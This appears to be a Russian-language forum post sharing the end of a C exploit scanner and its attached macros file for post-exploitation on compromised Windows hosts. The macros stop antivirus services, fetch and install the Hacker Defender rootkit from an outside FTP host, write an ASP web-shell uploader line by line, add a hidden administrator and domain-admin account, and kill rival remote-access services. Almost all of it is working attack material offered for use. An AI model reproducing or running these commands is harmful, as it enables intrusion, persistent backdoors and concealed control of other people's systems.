rpcopen++;
LeaveCriticalSection(&cslog);
attack(ip,version(ip,sock));


}
}
closesocket(sock);
memset(ip,'\0',sizeof(ip));
}
EnterCriticalSection(&css);
threads--;
sleep(1);
LeaveCriticalSection(&css);
//printf("Thread %i saliendo\n",(int)threadn);
_endthread();

}

/******************************************************************************/

Вот и еще файл macros.txt (прилагался в комплекте; видимо это просто Хелп к сплоиту)

[Macro]
name=kill_avs
key=!1
delay=500
cmd=net stop Mcshield
cmd=net stop "Norton Antivirus Service"
cmd=net stop "Panda Antivirus"
cmd=net stop "ZoneAlarm"
cmd=net stop "Detector de OfficeScanNT"
cmd=net stop "McAfee Framework Service"

[Macro]
name=upload_FTP
key=!2
delay=500
cmd=echo open xx.xx.xx.xx 1212>a
cmd=echo ftp>>a
cmd=echo ftp>>a
cmd=echo bin>>a
cmd=echo get hxdef.exe>>a
cmd=echo get hxdef.ini>>a
cmd=echo bye>>a
cmd=start ftp -s:a

[Macro]
name=Upload_tftp
key=!3
delay=500
cmd=tftp -i blablablabla
cmd=tftp -i blablablabla
cmd=tftp -i blablablabla

[Macro]
name=Upload_ASP
key=!4
delay=500
cmd=echo ^<html^>^<head^>^<title^>upload.asp^</title^>^</head^>^<body^> >upload.asp
cmd=echo ^<center^> >>upload.asp
cmd=echo ^<form method=post ENCTYPE="multipart/form-data"^> >>upload.asp
cmd=echo File to Upload: ^<input type="file" name="File1"^>^<br^> >>upload.asp
cmd=echo ^<input type="submit" Name="Action" value="Upload the file"^> >>upload.asp
cmd=echo ^</form^> >>upload.asp
cmd=echo ^</body^>^</HTML^> >>upload.asp
cmd=echo ^<!--#INCLUDE FILE="upload.inc"--^> >>upload.asp
cmd=echo ^<% >>upload.asp
cmd=echo If Request.ServerVariables("REQUEST_METHOD") = "POST" Then >>upload.asp
cmd=echo Set Fields = GetUpload() >>upload.asp
cmd=echo FilePath = Server.MapPath(".") ^& "\" ^& Fields("File1").FileName >>upload.asp
cmd=echo Fields("File1").Value.SaveAs FilePath >>upload.asp
cmd=echo End If >>upload.asp
cmd=echo %%^> >>upload.asp
cmd=@echo UPLOAD.ASP SUCCESSFULLY SENT. NOW SENDING UPLOAD.INC
cmd=@echo ^<script RUNAT=SERVER LANGUAGE=VBSCRIPT^> >>upload.inc
cmd=@echo Const IncludeType = 2 >>upload.inc
cmd=@echo Dim UploadSizeLimit >>upload.inc
cmd=@echo Function GetUpload() >>upload.inc
cmd=@echo Dim Result >>upload.inc
cmd=@echo Set Result = Nothing >>upload.inc
cmd=@echo If Request.ServerVariables("REQUEST_METHOD") = "POST" Then >>upload.inc
cmd=@echo Dim CT, PosB, Boundary, Length, PosE >>upload.inc
cmd=@echo CT = Request.ServerVariables("HTTP_Content_Type") >>upload.inc
cmd=@echo If LCase(Left(CT, 19)) = "multipart/form-data" Then >>upload.inc
cmd=@echo PosB = InStr(LCase(CT), "boundary=") >>upload.inc
cmd=@echo If PosB ^> 0 Then Boundary = Mid(CT, PosB + 9) >>upload.inc
cmd=@echo PosB = InStr(LCase(CT), "boundary=") >>upload.inc
cmd=@echo If PosB ^> 0 then >>upload.inc
cmd=@echo PosB = InStr(Boundary, ",") >>upload.inc
cmd=@echo If PosB ^> 0 Then Boundary = Left(Boundary, PosB - 1) >>upload.inc
cmd=@echo end if >>upload.inc
cmd=@echo Length = CLng(Request.ServerVariables("HTTP_Content_Length")) >>upload.inc
cmd=@echo If "" ^& UploadSizeLimit ^<^> "" Then >>upload.inc
cmd=@echo UploadSizeLimit = CLng(UploadSizeLimit) >>upload.inc
cmd=@echo If Length ^> UploadSizeLimit Then >>upload.inc
cmd=@echo Request.BinaryRead (Length) >>upload.inc
cmd=@echo Err.Raise 2, "GetUpload", "Upload size " ^& FormatNumber(Length, 0) ^& "B exceeds limit of " ^& FormatNumber(UploadSizeLimit, 0) ^& "B" >>upload.inc
cmd=@echo Exit Function >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo If Length ^> 0 And Boundary ^<^> "" Then >>upload.inc
cmd=@echo Boundary = "--" ^& Boundary >>upload.inc
cmd=@echo Dim Head, Binary >>upload.inc
cmd=@echo Binary = Request.BinaryRead(Length) >>upload.inc
cmd=@echo Set Result = SeparateFields(Binary, Boundary) >>upload.inc
cmd=@echo Binary = Empty >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo Err.Raise 10, "GetUpload", "Zero length request ." >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo Err.Raise 11, "GetUpload", "No file sent." >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo Err.Raise 1, "GetUpload", "Bad request method." >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Set GetUpload = Result >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function SeparateFields(Binary, Boundary) >>upload.inc
cmd=@echo Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary >>upload.inc
cmd=@echo Dim Fields >>upload.inc
cmd=@echo Boundary = StringToBinary(Boundary) >>upload.inc
cmd=@echo PosOpenBoundary = InStrB(Binary, Boundary) >>upload.inc
cmd=@echo PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0) >>upload.inc
cmd=@echo Set Fields = CreateObject("Scripting.Dictionary") >>upload.inc
cmd=@echo Do While (PosOpenBoundary ^> 0 And PosCloseBoundary ^> 0 And Not isLastBoundary) >>upload.inc
cmd=@echo Dim HeaderContent, FieldContent, bFieldContent >>upload.inc
cmd=@echo Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type >>upload.inc
cmd=@echo Dim Field, TwoCharsAfterEndBoundary >>upload.inc
cmd=@echo PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf)) >>upload.inc
cmd=@echo HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2) >>upload.inc
cmd=@echo bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2) >>upload.inc
cmd=@echo GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type >>upload.inc
cmd=@echo Set Field = CreateUploadField() >>upload.inc
cmd=@echo Set FieldContent = CreateBinaryData() >>upload.inc
cmd=@echo FieldContent.ByteArray = bFieldContent >>upload.inc
cmd=@echo FieldContent.Length = LenB(bFieldContent) >>upload.inc
cmd=@echo Field.Name = FormFieldName >>upload.inc
cmd=@echo Field.ContentDisposition = Content_Disposition >>upload.inc
cmd=@echo Field.FilePath = SourceFileName >>upload.inc
cmd=@echo Field.FileName = GetFileName(SourceFileName) >>upload.inc
cmd=@echo Field.ContentType = Content_Type >>upload.inc
cmd=@echo Field.Length = FieldContent.Length >>upload.inc
cmd=@echo Set Field.Value = FieldContent >>upload.inc
cmd=@echo Fields.Add FormFieldName, Field >>upload.inc
cmd=@echo TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2)) >>upload.inc
cmd=@echo isLastBoundary = TwoCharsAfterEndBoundary = "--" >>upload.inc
cmd=@echo If Not isLastBoundary Then >>upload.inc
cmd=@echo PosOpenBoundary = PosCloseBoundary >>upload.inc
cmd=@echo PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary) >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Loop >>upload.inc
cmd=@echo Set SeparateFields = Fields >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type) >>upload.inc
cmd=@echo Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";")) >>upload.inc
cmd=@echo Name = (SeparateField(Head, "name=", ";")) >>upload.inc
cmd=@echo If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2) >>upload.inc
cmd=@echo FileName = (SeparateField(Head, "filename=", ";")) >>upload.inc
cmd=@echo If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2) >>upload.inc
cmd=@echo Content_Type = LTrim(SeparateField(Head, "content-type:", ";")) >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function SeparateField(From, ByVal sStart, ByVal sEnd) >>upload.inc
cmd=@echo Dim PosB, PosE, sFrom >>upload.inc
cmd=@echo sFrom = LCase(From) >>upload.inc
cmd=@echo PosB = InStr(sFrom, sStart) >>upload.inc
cmd=@echo If PosB ^> 0 Then >>upload.inc
cmd=@echo PosB = PosB + Len(sStart) >>upload.inc
cmd=@echo PosE = InStr(PosB, sFrom, sEnd) >>upload.inc
cmd=@echo If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf) >>upload.inc
cmd=@echo If PosE = 0 Then PosE = Len(sFrom) + 1 >>upload.inc
cmd=@echo SeparateField = Mid(From, PosB, PosE - PosB) >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo SeparateField = Empty >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function GetFileName(FullPath) >>upload.inc
cmd=@echo Dim Pos, PosF >>upload.inc
cmd=@echo PosF = 0 >>upload.inc
cmd=@echo For Pos = Len(FullPath) To 1 Step -1 >>upload.inc
cmd=@echo Select Case Mid(FullPath, Pos, 1) >>upload.inc
cmd=@echo Case "/", "\": PosF = Pos + 1: Pos = 0 >>upload.inc
cmd=@echo End Select >>upload.inc
cmd=@echo Next >>upload.inc
cmd=@echo If PosF = 0 Then PosF = 1 >>upload.inc
cmd=@echo GetFileName = Mid(FullPath, PosF) >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function BinaryToString(Binary) >>upload.inc
cmd=@echo dim cl1, cl2, cl3, pl1, pl2, pl3 >>upload.inc
cmd=@echo Dim L >>upload.inc
cmd=@echo cl1 = 1 >>upload.inc
cmd=@echo cl2 = 1 >>upload.inc
cmd=@echo cl3 = 1 >>upload.inc
cmd=@echo L = LenB(Binary) >>upload.inc
cmd=@echo Do While cl1^<=L >>upload.inc
cmd=@echo pl3 = pl3 ^& Chr(AscB(MidB(Binary,cl1,1))) >>upload.inc
cmd=@echo cl1 = cl1 + 1 >>upload.inc
cmd=@echo cl3 = cl3 + 1 >>upload.inc
cmd=@echo if cl3^>300 then >>upload.inc
cmd=@echo pl2 = pl2 ^& pl3 >>upload.inc
cmd=@echo pl3 = "" >>upload.inc
cmd=@echo cl3 = 1 >>upload.inc
cmd=@echo cl2 = cl2 + 1 >>upload.inc
cmd=@echo if cl2^>200 then >>upload.inc
cmd=@echo pl1 = pl1 ^& pl2 >>upload.inc
cmd=@echo pl2 = "" >>upload.inc
cmd=@echo cl2 = 1 >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Loop >>upload.inc
cmd=@echo BinaryToString = pl1 ^& pl2 ^& pl3 >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function BinaryToStringold(Binary) >>upload.inc
cmd=@echo Dim I, S >>upload.inc
cmd=@echo For I = 1 To LenB(Binary) >>upload.inc
cmd=@echo S = S ^& Chr(AscB(MidB(Binary, I, 1))) >>upload.inc
cmd=@echo Next >>upload.inc
cmd=@echo BinaryToString = S >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function StringToBinary(String) >>upload.inc
cmd=@echo Dim I, B >>upload.inc
cmd=@echo For I=1 to len(String) >>upload.inc
cmd=@echo B = B ^& ChrB(Asc(Mid(String,I,1))) >>upload.inc
cmd=@echo Next >>upload.inc
cmd=@echo StringToBinary = B >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function vbsSaveAs(FileName, ByteArray) >>upload.inc
cmd=@echo Dim FS, TextStream>>upload.inc
cmd=@echo Set FS = CreateObject("Scripting.FileSystemObject") >>upload.inc
cmd=@echo Set TextStream = FS.CreateTextFile(FileName) >>upload.inc
cmd=@echo TextStream.Write BinaryToString(ByteArray) >>upload.inc
cmd=@echo TextStream.Close >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo ^</SCRIPT^> >>upload.inc
cmd=@echo ^<script RUNAT=SERVER LANGUAGE=JSCRIPT^> >>upload.inc
cmd=@echo function CreateUploadField(){ return new uf_Init() } >>upload.inc
cmd=@echo function uf_Init(){ >>upload.inc
cmd=@echo this.Name = null >>upload.inc
cmd=@echo this.ContentDisposition = null >>upload.inc
cmd=@echo this.FileName = null >>upload.inc
cmd=@echo this.FilePath = null >>upload.inc
cmd=@echo this.ContentType = null >>upload.inc
cmd=@echo this.Value = null >>upload.inc
cmd=@echo this.Length = null >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo function CreateBinaryData(){ return new bin_Init() } >>upload.inc
cmd=@echo function bin_Init(){ >>upload.inc
cmd=@echo this.ByteArray = null >>upload.inc
cmd=@echo this.Length = null >>upload.inc
cmd=@echo this.String = jsBinaryToString >>upload.inc
cmd=@echo this.SaveAs = jsSaveAs >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo function jsBinaryToString(){ >>upload.inc
cmd=@echo return BinaryToString(this.ByteArray) >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo function jsSaveAs(FileName){ >>upload.inc
cmd=@echo return vbsSaveAs(FileName, this.ByteArray) >>upload.inc
cmd=@echo } >>upload.inc
cmd=@echo ^</SCRIPT^>>>upload.inc


[Macro]
name=Adduser
key=!5
delay=500
cmd=net user SUPPORT_3569a74r KaHTSecuritycheck/add
cmd=net localgroup Administradores SUPPORT_3569a74r /add
cmd=net localgroup Administrators SUPPORT_3569a74r /add
cmd=net group "Domain Admins" SUPPORT_3569a74r /add

[Macro]
name=Killhax0rs
key=!6
delay=500
cmd=net stop serv-u
cmd=net stop r_server
cmd=net stop "DAmeware 2.6"
cmd=net stop "RA Server"
cmd=net stop firedaemon....

[Macro]
name=upload_FTP
key=!9
delay=300
cmd=echo open xx.xx.xxx.xx 1212>a
cmd=echo ftp>>a
cmd=echo ftp>>a
cmd=echo bin>>a
cmd=echo get hxdef.exe>>a
cmd=echo get hxdef.ini>>a
cmd=echo bye>>a
cmd=ftp -s:a
delay=5000
cmd=dir c:\ /a
cmd=dir d:\ /a
cmd=dir e:\ /a
cmd=hxdef.exe -:installonly
cmd=del a
cmd=net start hackerdefender

сказали аха и все забили!